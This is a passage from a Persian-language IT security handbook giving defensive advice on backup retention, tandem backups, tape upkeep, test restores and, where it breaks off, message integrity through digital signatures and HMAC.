‫ﻛﺸﻮﺭﻫﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﺮﺍﻳﻂ ﻗﺎﻧﻮﻧﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻧﮕﻬﺪﺍﺭﻱ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺍﻧﻮﺍﻉ ﺧﺎﺻﻲ ﺍﺯ ﺩﺍﺩﻩﻫﺎ )ﻣﺜﻞ ﺛﺒﺘﻬﺎﻱ ﺣـﺴﺎﺑﺪﺍﺭﻱ( ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﻳﻚ ﺩﻭﺭﺓ ﺣﺪﺍﻗﻠﻲ ﺍﻟﺰﺍﻣﻲ ﮐﺮﺩﻩ ﺑﺎﺷﺪ‪ .‬ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺩﺍﺷﺘﻦ ﻳﻚ ﺳﻴﺎﺳﺖ ﺑﺮﺍﻱ ﺗﺨﺮﻳﺐ ﺩﺍﺩﻩﻫﺎ‪ ١٢٠‬ﻛﻪ ﺣﺪﺍﻛﺜﺮ ﺯﻣﺎﻥ ﻧﮕﻬﺪﺍﺭﻱ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎ‬
‫ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ ﻧﻴﺰ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳﺖ‪.‬‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﺑﺨﻮﺍﻫﻴﺪ ﻳﻚ ﻧﺸﺎﻧﻪﮔﺮ ﻳﺎ ﻓﻬﺮﺳﺖ ﺍﺯ ﺍﺳﺎﻣﻲ ﻓﺎﻳﻠﻬﺎﻱ ﺭﻭﻱ ﻧﻮﺍﺭﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺧﻮﺩ ﻧﮕﻬﺪﺍﺭﻳﺪ‪ .‬ﺑﺎ ﺍﻳﻦ ﺭﻭﺵ ﻫﺮ ﻭﻗﺖ ﺑـﻪ‬
‫ﺍﺣﻴﺎﻱ ﻣﺠﺪﺩ ﻳﻚ ﻓﺎﻳﻞ ﻧﻴﺎﺯ ﭘﻴﺪﺍ ﻛﻨﻴﺪ‪ ،‬ﺑﺠﺎﻱ ﺍﻳﻨﻜﻪ ﻣﺠﺒﻮﺭ ﺷﻮﻳﺪ ﻫﺮ ﻧﻮﺍﺭ ﺭﺍ ﺑﻄﻮﺭ ﺟﺪﺍﮔﺎﻧﻪ ﺑﺨﻮﺍﻧﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺑﺮﺭﺳـﻲ ﻓﻬﺮﺳـﺖ‪ ،‬ﻧـﻮﺍﺭ‬
‫‪119 Differential Backup‬‬
‫‪120 Data Destruction‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﺭﺍ ﺗﺎ ﭼﻪ ﺯﻣﺎﻧﻲ ﻧﮕﻪ ﺩﺍﺭﻳﻢ‬
‫‪٣١٠‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺻﺤﻴﺢ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺭﺍ ﭘﻴﺪﺍ ﻛﻨﻴﺪ‪ .‬ﺩﺭ ﺩﺳﺖ ﺩﺍﺷﺘﻦ ﻳﻚ ﻧﺴﺨﺔ ﭼﺎﭘﻲ ﺍﺯ ﺍﻳﻦ ﻓﻬﺮﺳﺘﻬﺎ ﻫﻢ ﺍﻳﺪﺓ ﺧـﻮﺑﻲ ﺍﺳـﺖ‪ ،‬ﺧـﺼﻮﺻﹰﺎ ﺍﮔـﺮ ﻓﻬﺮﺳـﺖ‬
‫ﺍﻟﮑﺘﺮﻭﻧﻴﮑﻲ ﺷﻤﺎ ﺭﻭﻱ ﺳﻴﺴﺘﻤﻲ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻻﺯﻡ ﺑﺎﺷﺪ ﺍﺣﻴﺎ ﺷﻮﺩ!‬
‫ﺍﮔﺮ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﺮﺍﻱ ﻣﺪﺕ ﻃﻮﻻﻧﻲ ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺯﻣﺎﻧﻲ ﻛﻪ ﻳﻚ ﺳﻴـﺴﺘﻢ ﭘـﺸﺘﻴﺒﺎﻥ ﺟﺪﻳـﺪ ﺧﺮﻳـﺪﺍﺭﻱ ﻣـﻲﻛﻨﻴـﺪ‪،‬‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺪﺭﺳﺘﻲ ﺭﻭﻱ ﺁﻥ ﻣﻨﺘﻘﻞ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﻏﻴﺮ ﺍﻳﻨﺼﻮﺭﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﻧﻮﺍﺭﻫﺎﻳﻲ ﻣﻮﺍﺟﻪ ﺷﻮﻳﺪ ﻛـﻪ ﺑﻮﺳـﻴﻠﺔ ﻫـﻴﭽﻜﺲ ﻭ‬
‫ﻫﻴﭻ ﻛﺠﺎ ﻧﻤﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺧﻮﺍﻧﺪ‪ .‬ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﺑﺮﺍﻱ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﺗﺤﻘﻴﻘﺎﺗﻲ ﻣﻬﻢ ﻭ ﺣﺘﻲ ﻣﺆﺳﺴﺔ ﻣﻠﻲ ﺭﺍﻫﺒﺮﻱ ﻓﻀﺎﻳﻲ ﻭ ﻫﻮﺍﻳﻲ ﺍﻳﺎﻻﺕ‬
‫ﻣﺘﺤﺪﻩ )‪ ١٢١(NASA‬ﻫﻢ ﺭﻭﻱ ﺩﺍﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺳﺎﻳﺮ ﻧﻜﺎﺕ ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ‬
‫ﭼﻨﺪ ﺭﺍﻫﻜﺎﺭ ﻣﻨﺎﺳﺐ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﭘﺸﺘﻴﺒﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺠﻤﻮﻋﻪﻫﺎﻱ ﺗﻜﺮﺍﺭﺷﻮﻧﺪﺓ ﭘﺸﺘﻴﺒﺎﻥ‬
‫‪١٢٢‬‬
‫ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺩﻭ ﻣﺠﻤﻮﻋﺔ ﻣﺠﺰﺍﻱ ﻧﻮﺍﺭﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻳﻚ ﭘﺸﺘﻴﺒﺎﻥ ﭘﺸﺖ ﺳﺮ ﻫﻢ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ‪ .‬ﺑـﺎ ﺍﻳـﻦ ﺍﺳـﺘﺮﺍﺗﮋﻱ‬
‫ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ‪ ،‬ﺩﻭ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ )ﺑﻨﺎﻣﻬﺎﻱ ‪ A‬ﻭ ‪ (B‬ﺗﻬﻴﻪ ﻣﻲﻛﻨﻴﺪ‪ .‬ﺳﭙﺲ ﻭﻗﺘﻲ ﺍﻭﻟﻴﻦ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺮﺍﻳﺸﻲ ﺧـﻮﺩ ‪ -‬ﺍﻓﺰﺍﻳـﺸﻲ ‪ - A‬ﺭﺍ ﺍﻧﺠـﺎﻡ‬
‫ﺩﺍﺩﻳﺪ‪ ،‬ﺗﻤﺎﻡ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﺑﻌﺪ ﺍﺯ ﺗﻬﻴﺔ ﺁﺧﺮﻳﻦ ﭘﺸﺘﻴﺒﺎﻥ ‪ A‬ﺳﺎﺧﺘﻪ ﻳﺎ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ ﺭﺍ ‪ -‬ﺣﺘـﻲ ﺍﮔـﺮ ﺩﺭ ﭘـﺸﺘﻴﺒﺎﻥ ‪ B‬ﻣﻮﺟـﻮﺩ ﺑﺎﺷـﻨﺪ ‪-‬‬
‫ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻣﻲﻛﻨﻴﺪ‪ .‬ﺩﻭﻣﻴﻦ ﺑﺎﺭﻱ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﻓﺰﺍﻳﺸﻲ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻴﺪ ‪ -‬ﺍﻓﺰﺍﻳﺸﻲ ‪ - B‬ﺗﻤﺎﻡ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﺑﻌﺪ ﺍﺯ ﺗﻬﻴﺔ ﺁﺧﺮﻳﻦ‬
‫ﭘﺸﺘﻴﺒﺎﻥ ‪ B‬ﺳﺎﺧﺘﻪ ﻳﺎ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ ﺭﺍ ﻣﻲﻧﻮﻳﺴﻴﺪ ‪ -‬ﺣﺘﻲ ﺍﮔﺮ ﺩﺭ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ ‪ A‬ﻣﻮﺟﻮﺩ ﺑﺎﺷﻨﺪ‪ .‬ﺍﻳﻦ ﺳﻴـﺴﺘﻢ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺧﺮﺍﺑـﻲ‬
‫ﺭﺳﺎﻧﻪ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻣﻘﺎﻭﻡ ﺍﺳﺖ‪ ،‬ﭼﻮﻥ ﺍﺯ ﻫﺮ ﻓﺎﻳﻞ ﺩﺭ ﺩﻭ ﻣﺤﻞ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺷﺪﻩ ﺍﺳﺖ‪ ،‬ﻫﺮﭼﻨﺪﺍﻳﻨﻜﺎﺭ ﺯﻣـﺎﻧﻲ ﻛـﻪ ﺷـﻤﺎ ﺑـﺮﺍﻱ ﺗﻬﻴـﺔ‬
‫ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺻﺮﻑ ﻣﻲﻛﻨﻴﺪ ﺭﺍ ﺩﻭ ﺑﺮﺍﺑﺮ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺟﺎﻳﮕﺰﻳﻨﻲ ﻧﻮﺍﺭﻫﺎ ﺩﺭﺻﻮﺭﺕ ﻧﻴﺎﺯ‬
‫ﻧﻮﺍﺭﻫﺎ ﺭﺳﺎﻧﺔ ﻓﻴﺰﻳﻜﻲ ﻫﺴﺘﻨﺪ ﻭ ﻫﺮ ﺑﺎﺭ ﻛﻪ ﺷﻤﺎ ﺑﻮﺳﻴﻠﻪ ﻧﻮﺍﺭﮔﺮﺩﺍﻥ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺗﺎ ﺍﻧﺪﺍﺯﻩﺍﻱ ﻛﻴﻔﻴﺘﺸﺎﻥ ﭘﺎﻳﻴﻦ ﻣﻲﺁﻳﺪ‪ .‬ﺑﺮ ﺍﺳﺎﺱ‬
‫ﺗﺠﺮﺑﺔ ﺧﻮﺩ ﺍﺯ ﻧﻮﺍﺭﮔﺮﺩﺍﻥ ﻭ ﻧﻮﺍﺭ‪ ،‬ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻫﺮ ﻧﻮﺍﺭ ﻳـﻚ ﻃـﻮﻝ ﻋﻤـﺮ ﻣﻔﻴـﺪ ﺗﻌﻴـﻴﻦ ﻛﻨﻴـﺪ‪ .‬ﺑﻌـﻀﻲ ﺍﺯ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺑـﺮﺍﻱ ﻧﻮﺍﺭﻫﺎﻳـﺸﺎﻥ‬
‫ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻳﻲ ﻣﻲﮔﺬﺍﺭﻧﺪ )ﺑﺮﺍﻱ ﻣﺜﺎﻝ ‪ ۳‬ﺳﺎﻝ ﻳﺎ ‪ ۲۰۰۰‬ﭼﺮﺧﻪ(‪ ،‬ﻭﻟﻲ ﺑﻌﻀﻲ ﻫﻢ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﻧﻤﻲﻛﻨﻨﺪ‪ .‬ﺧﻮﺏ ﺩﻗـﺖ ﻛﻨﻴـﺪ ﻛـﻪ ﻓﺮﻭﺷـﻨﺪﻩ ﺩﺭ ﺍﻳـﻦ‬
‫ﺯﻣﻴﻨﻪ ﭼﻪ ﺗﻮﺻﻴﻪﺍﻱ ﺩﺍﺭﺩ ﻭ ﺁﻧﺮﺍ ﺯﻳﺮ ﭘﺎ ﻧﮕﺬﺍﺭﻳﺪ‪ .‬ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻫﺰﻳﻨﻪﺍﻱ ﻛﻪ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﻧـﻮﺍﺭ ﺑﻌـﺪ ﺍﺯ ﺍﺗﻤـﺎﻡ ﻋﻤـﺮ ﻣﻔﻴـﺪ ﺁﻥ‬
‫ﭘﺲﺍﻧﺪﺍﺯ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺑﺎ ﻫﺰﻳﻨﺔ ﺍﻣﻜﺎﻥ ﺟﺒﺮﺍﻥ ﻧﺸﺪﻥ ﻳﻚ ﺧﺴﺎﺭﺕ ﺍﺳﺎﺳﻲ ﺑﺮﺍﺑﺮﻱ ﻧﻤﻲﻛﻨﺪ‪.‬‬
‫ﻧﻮﺍﺭﮔﺮﺩﺍﻧﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺗﻤﻴﺰ ﻧﮕﻬﺪﺍﺭﻳﺪ‬
‫ﺍﮔﺮ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﻧﻮﺍﺭ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺍﺯ ﺑﺮﻧﺎﻣﺔ ﺯﻣﺎﻧﻲ ﭘﻴﺸﮕﻴﺮﺍﻧﺔ ﻓﺮﻭﺷﻨﺪﺓ ﻧﻮﺍﺭﮔﺮﺩﺍﻥ ﭘﻴﺮﻭﻱ ﻛﻨﻴﺪ ﻭ ﻃﺒﻖ ﺗﻮﺻﻴﻪﻫﺎ ﺍﺯ ﻳـﻚ‬
‫ﻓﺸﻨﮓ ﺗﻤﻴﺰﻛﻨﻨﺪﺓ ﻣﻨﺎﺳﺐ ﻳﺎ ﻳﻚ ﻣﮑﺎﻧﻴﺰﻡ ﺩﻳﮕﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻧﺎﺗﻮﺍﻧﻲ ﺩﺭ ﺧﻮﺍﻧﺪﻥ ﻳﻚ ﻧﻮﺍﺭ ﺑﺪﻟﻴﻞ ﻛﺜﻴﻒ ﺑﻮﺩﻥ ﻧـﻮﺍﺭﮔﺮﺩﺍﻥ ﺁﺯﺍﺭﺩﻫﻨـﺪﻩ‬
‫ﺍﺳﺖ؛ ﺧﺼﻮﺻﹰﺎ ﻭﻗﺘﻲ ﻣﻌﻠﻮﻡ ﺷﻮﺩ ﺩﺍﺩﻩﺍﻱ ﻛﻪ ﺭﻭﻱ ﻧﻮﺍﺭ ﻧﻮﺷﺘﻪﺍﻳﺪ ﺧﺮﺍﺏ ﺍﺳﺖ ﻭ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﻳﻚ ﺧﺮﺍﺑﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﺑﮕﻴﺮﺩ‪.‬‬
‫ﺗﺼﺪﻳﻖ ﺻﺤﺖ ﭘﺸﺘﻴﺒﺎﻥ‬
‫ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺑﺎﻳﺪ ﺳﻌﻲ ﻛﻨﻴﺪ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﭼﻨﺪ ﻓﺎﻳﻞ ﺭﺍ ﺑﺮﺍﻱ ﺍﺣﻴﺎ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺨﻮﺍﻧﻴﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺗﺠﻬﻴﺰﺍﺕ ﻭ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﺷـﻤﺎ‬
‫ﺑﺪﺭﺳﺘﻲ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺩﺍﺳﺘﺎﻧﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺩﺭﺑﺎﺭﺓ ﻣﺮﺍﻛﺰ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺩﻳﺴﻚﮔﺮﺩﺍﻧﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻩﺍﻧﺪ ﻭ ﻭﻗﺘـﻲ ﺳـﺮﺍﻍ‬
‫ﻧﻮﺍﺭﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺧﻮﺩ ﺭﻓﺘﻪﺍﻧﺪ‪ ،‬ﺁﻧﻬﺎ ﺭﺍ ﻏﻴﺮﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﻳﺎﻓﺘﻪﺍﻧﺪ‪ .‬ﺍﻳﻦ ﺍﺗﻔﺎﻕ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺘﻴﺠـﺔ ﻧﻮﺍﺭﻫـﺎﻱ ﺑـﻲﻛﻴﻔﻴـﺖ‪ ،‬ﺭﻭﺍﻟﻬـﺎﻱ ﻧﺎﻣﻨﺎﺳـﺐ‬
‫ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ‪ ،‬ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﺮﺍﺏ‪ ،‬ﺧﻄﺎﻱ ﺍﭘﺮﺍﺗﻮﺭ‪ ،‬ﻳﺎ ﻣﺸﻜﻼﺕ ﺩﻳﮕﺮ ﺑﺎﺷﺪ‪.‬‬
‫‪121 U.S. National Aeronautics and Space Administration‬‬
‫‪122 Tandem Backup‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫‪٣١١‬‬
‫ﺣﺪﺍﻗﻞ ﻳﻜﺒﺎﺭ ﺩﺭ ﺳﺎﻝ ﺑﺎﻳﺪ ﺳﻌﻲ ﻛﻨﻴﺪ ﻛﻞ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺍﺣﻴﺎ ﻛﻨﻴﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺳﻴﺴﺘﻢ ﭘﺸﺘﻴﺒﺎﻥ ﺷﻤﺎ ﺑﺪﺭﺳﺘﻲ ﻛﺎﺭ‬
‫ﻣﻲﻛﻨﺪ‪ .‬ﺑﺎ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﻣﺘﻔﺎﻭﺕ ﻭ ﭘﻴﻜﺮﺑﻨﺪﻱﻧﺸﺪﻩ ﺷﺮﻭﻉ ﻛﻨﻴﺪ ﻭ ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﻤﺎﻡ ﻧﻮﺍﺭﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺣﻴﺎ ﻛﻨﻴـﺪ ﻭ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ ﺑﻜـﺎﺭ‬
‫ﺍﻧﺪﺍﺯﻳﺪ ﻳﺎ ﻧﻪ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻣﺘﻮﺟﻪ ﻣﻲﺷﻮﻳﺪ ﻛﻪ ﺑﻌﻀﻲ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻬﻢ ﺩﺭ ﻧﻮﺍﺭﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺷﻤﺎ ﺍﺯ ﺩﺳـﺖ ﺭﻓﺘـﻪﺍﻧـﺪ‪ .‬ﺍﻳـﻦ ﺁﺯﻣﺎﻳـﺸﻬﺎﻱ‬
‫ﻋﻤﻠﻲ ﺑﻬﺘﺮﻳﻦ ﺯﻣﺎﻥ ﺑﺮﺍﻱ ﻛﺸﻒ ﻣﺸﻜﻼﺕ ﻭ ﺣﻞ ﺁﻧﻬﺎ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﻳﻚ ﺁﺯﻣﺎﻳﺶ ﺑﺴﻴﺎﺭ ﻣﻨﺎﺳﺐ‪ ،‬ﺍﻧﺘﺨﺎﺏ ﻳﻚ ﻓﺎﻳﻞ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﻳﻜﺒﺎﺭ ﺩﺭ ﻫﻔﺘﻪ ﻳﺎ ﻳﻜﺒﺎﺭ ﺩﺭ ﻣﺎﻩ ﻭ ﺗﻼﺵ ﺑـﺮﺍﻱ ﺍﺣﻴـﺎﻱ ﻣﺠـﺪﺩ ﺁﻥ ﺍﺳـﺖ‪.‬‬
‫ﺍﻳﻨﻜﺎﺭ ﻧﻪ ﺗﻨﻬﺎ ﻣﺸﺨﺺ ﺧﻮﺍﻫﺪ ﻛﺮﺩ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺟﺎﻣﻊ ﻫﺴﺘﻨﺪ‪ ،‬ﺑﻠﻜﻪ ﺗﺠﺮﺑﻪ ﺍﻳﻦ ﺍﺣﻴﺎﻫﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﻋﻤﻠﻴـﺎﺕ ﺍﺣﻴـﺎﻱ ﻭﺍﻗﻌـﻲ ﺭﺍ ﺑـﺴﻴﺎﺭ‬
‫ﺳﺎﺩﻩﺗﺮ ﻛﻨﺪ‪.‬‬
‫ﺑﺤﺚ ﻣﻔﺼﻞ ﺩﺭﺑﺎﺭﺓ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻭ ﺍﺣﻴﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻮﺿﻮﻉ ﻳﻚ ﻛﺘﺎﺏ ﻣﺠﺰﺍ ﺑﺎﺷﺪ ‪ -‬ﻛﺘﺎﺏ ﻛﻮﺭﺗﻴﺲ ﭘﺮﻳﺴﺘﻮﻥ‪ ،١٢٣‬ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ‬
‫ﻭ ﺗﺮﻣﻴﻢ ‪ ١٢٤Unix‬ﻛﻪ ﺗﻮﺳﻂ ﺍﻧﺘﺸﺎﺭﺍﺕ ﺍﻭﺭﻳﻠﻲ ﺑﻪ ﭼﺎﭖ ﺭﺳﻴﺪﻩ ﻳﻚ ﻧﻤﻮﻧﺔ ﻋﺎﻟﻲ ﺍﺳﺖ‪.‬‬
‫ﻳﻜﭙﺎﺭﭼﮕﻲ ﺍﻧﺘﻘﺎﻝ‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻨﻜﻪ ﻭﻗﺘﻲ ﺩﺍﺩﻩﺍﻱ ﺭﺍ ﺭﻭﻱ ﺷﺒﻜﻪ ﺑـﺮﺍﻱ ﺷـﺨﺺ ﺩﻳﮕـﺮﻱ ﻣـﻲﻓﺮﺳـﺘﻴﺪ‪،‬‬
‫ﮔﻴﺮﻧﺪﻩ ﺁﻧﺮﺍ ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺷﻤﺎ ﻓﺮﺳﺘﺎﺩﻩﺍﻳﺪ ‪ -‬ﻣﺤﺎﻓﻈﺖﺷﺪﻩ ﺍﺯ ﺧﺮﺍﺑﻲ ﺗﺼﺎﺩﻓﻲ ﻳﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ ﻋﻤﺪﻱ ‪ -‬ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﺪ‪ .‬ﻳﻚ ﺍﺳـﺘﺮﺍﺗﮋﻱ‬
‫ﻣﺘﺪﺍﻭﻝ ﺷﺎﻣﻞ ﺍﻣﻀﺎﻱ ﻓﺎﻳﻞ ﺑﺼﻮﺭﺕ ﺩﻳﺠﻴﺘﺎﻟﻲ ‪ -‬ﺑﺎ ﻣﺤﺎﺳﺒﺔ ﻳﻚ ﺧﻼﺻﺔ ﺭﻣﺰﺷﺪﻩ ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺧﻼﺻﻪ ﺑﺎ ﻳـﻚ ﺍﻟﮕـﻮﺭﻳﺘﻢ ﻣﺘﻘـﺎﺭﻥ ﻳـﺎ‬
‫ﻧﺎﻣﺘﻘﺎﺭﻥ ‪ -‬ﻭ ﺳﭙﺲ ﺍﺭﺳﺎﻝ ﺁﻥ ﺑﻪ ﻫﻤﺮﺍﻩ ﻓﺎﻳﻞ )ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺧﻮﺩﺵ ﻫﻢ ﺑﺪﻟﻴﻞ ﻣﺤﺮﻣﺎﻧﮕﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺑﺎﺷـﺪ( ﺍﺳﺖ‪ .‬ﮔﻴﺮﻧـﺪﻩ ﺧﻼﺻـﻪ ﺭﺍ ﺍﺯ‬
‫ﺭﻭﻱ ﻓﺎﻳﻞ ﻣﺠﺪﺩﹰﺍ ﻣﺤﺎﺳﺒﻪ ﻛﺮﺩﻩ ﻭ ﺳﭙﺲ ﺧﻼﺻﺔ ﺍﺭﺳﺎﻝﺷﺪﻩ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﻛﻨﺪ‪ .‬ﺍﮔﺮ ﺍﻳﻨﺪﻭ ﻣﻄﺎﺑﻘﺖ ﻛﺮﺩﻧﺪ‪ ،‬ﻳﻜﭙﺎﺭﭼﮕﻲ ﭘﻴﺎﻡ ﺗـﻀﻤﻴﻦ‬
‫ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺗﺎﺑﻊ ‪ hash‬ﺗﺼﺪﻳﻖ ﭘﻴﺎﻡ‪ (HMAC) ١٢٥‬ﺭﻭﺵ ﺩﻳﮕﺮﻱ ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﻳﻜﭙﺎﺭﭼﮕﻲ ﭘﻴﺎﻣﻲ ﺍﻧﺘﻘﺎﻝﻳﺎﻓﺘﻪ ﺑﻴﻦ ﺩﻭ ﻃﺮﻑ ﻛﻪ ﺭﻭﻱ ﻳﻚ ﻛﻠﻴﺪ ﺭﻣـﺰﻱ‬
‫ﻣﺸﺘﺮﮎ ﺑﺎ ﻫﻢ ﺗﻮﺍﻓﻖ ﻛﺮﺩﻩﺍﻧﺪ ﻣﻲﺑﺎﺷﺪ‪ HMAC .‬ﭘﻴﺎﻡ ﺍﺻﻠﻲ ﻭ ﻳﻚ ﻛﻠﻴﺪ ﺭﺍ ﺑﺮﺍﻱ ﻣﺤﺎﺳﺒﺔ ﻳـﻚ ﺗـﺎﺑﻊ ﺧﻼﺻـﻪﭘﻴـﺎﻡ ﺍﺯ ﻫـﺮ ﺩﻭﻱ ﺍﻳﻨﻬـﺎ‬
